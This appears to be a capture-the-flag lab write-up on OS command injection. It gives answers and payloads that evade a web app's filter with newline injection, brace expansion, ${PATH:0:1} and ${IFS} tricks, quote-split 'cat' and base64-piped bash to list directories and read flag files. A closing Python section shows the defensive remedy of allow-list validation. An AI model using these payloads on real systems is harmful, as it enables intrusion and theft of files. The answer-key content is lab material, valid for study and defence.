Questions

Review the HTML source code of the page to find where the front-end input validation is happening. On which line number is it?

Line 17

Try using the remaining three injection operators (new-line, &, |), and see how each works and how the output differs. Which of them only shows the output of the injected command?

Answer: |

Use what you learned in this section to execute the command 'ls -la'. What is the size of the 'index.php' file?

Ans: ip=127.0.0.1%0a{ls,-la}, 1613

Use what you learned in this section to find the name of the user in the '/home' folder. What user did you find?

%0a{ls,-la,${PATH:0:1},${IFS}home} shows ls -la / but it does not show what is inside /home.

Let's try modifying the payload further.

ip=127.0.0.1%0a{ls,-la,${PATH:0:1}home}

Ans: 1nj3c70r

Use what you learned in this section to find the content of flag.txt in the home folder of the user you previously found.

ip=127.0.0.1%0a{c'a't,${PATH:0:1}home${PATH:0:1}1nj3c70r${PATH:0:1}flag.txt} can be interpreted as ip=127.0.0.1\n cat /home/1nj3c70r/flag.txt

The ' inside cat (c'a't) is there to bypass the filter.

cat /home/1nj3c70r/flag.txt is wrapped in { } to bypass the filter as well.

Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1

echo -n 'find /usr/share/ | grep root | grep mysql | tail -n 1' | base64

We could also run cat /flag.txt or cat /etc/passwd through the base64-encoded command, but to answer the question, below is the command injection we want to execute after the IP address field.

bash<<<$(base64 -d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)

So the final payload is: ip=127.0.0.1%0abash<<<$(base64%09-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)
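As an added defensive example (not part of the original writeup or the lab), the Python below contrasts a constructed deny-list filter in the style the payloads above are built to evade with allow-list validation of the ip parameter and argv-based execution; the sample values, the blacklist pattern and the short base64 string are my own constructions, not the lab's real filter.

```python
import ipaddress
import re
from typing import List, Optional
from urllib.parse import unquote

# Constructed samples of the ip= value as it arrives URL-encoded: a benign
# address first, then the shapes of the payloads walked through on this page.
SAMPLE_VALUES = [
    "127.0.0.1",
    "127.0.0.1%0a{ls,-la}",
    "127.0.0.1%0a{ls,-la,${PATH:0:1}home}",
    "127.0.0.1%0a{c'a't,${PATH:0:1}home${PATH:0:1}1nj3c70r${PATH:0:1}flag.txt}",
    "127.0.0.1%0abash<<<$(base64%09-d<<<ZmluZCAvdXNy)",  # constructed base64
]

# A constructed deny-list in the spirit of the lab's filter: it rejects the
# obvious operators, the space character and the word "cat". Newlines, tabs,
# brace expansion, ${IFS}, ${PATH:0:1} and c'a't all slip past it.
BLACKLISTED = re.compile(r"[;&|` ]|cat")


def blacklist_filter_allows(raw_value: str) -> bool:
    """True if the naive deny-list would accept the URL-decoded value."""
    return BLACKLISTED.search(unquote(raw_value)) is None


def validate_ip(raw_value: str) -> Optional[str]:
    """Allow-list check: return the canonical IP literal, or None otherwise.

    ipaddress.ip_address() accepts only a well-formed address, so a newline,
    tab, braces, quotes or ${...} expansion fails before any command is built.
    """
    try:
        return str(ipaddress.ip_address(unquote(raw_value)))
    except ValueError:
        return None


def build_ping_argv(raw_value: str) -> Optional[List[str]]:
    """Build the ping argv (never a shell string); None if the value is rejected.

    Passing this list to subprocess.run without shell=True means no shell ever
    parses the argument, so operators and expansions carry no meaning.
    """
    ip = validate_ip(raw_value)
    return None if ip is None else ["ping", "-c", "1", ip]


if __name__ == "__main__":
    for value in SAMPLE_VALUES:
        print(f"{value!r}: deny-list allows={blacklist_filter_allows(value)}, "
              f"allow-list argv={build_ping_argv(value)}")
```

Running it shows the deny-list accepting every payload while the allow-list accepts only the plain address.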
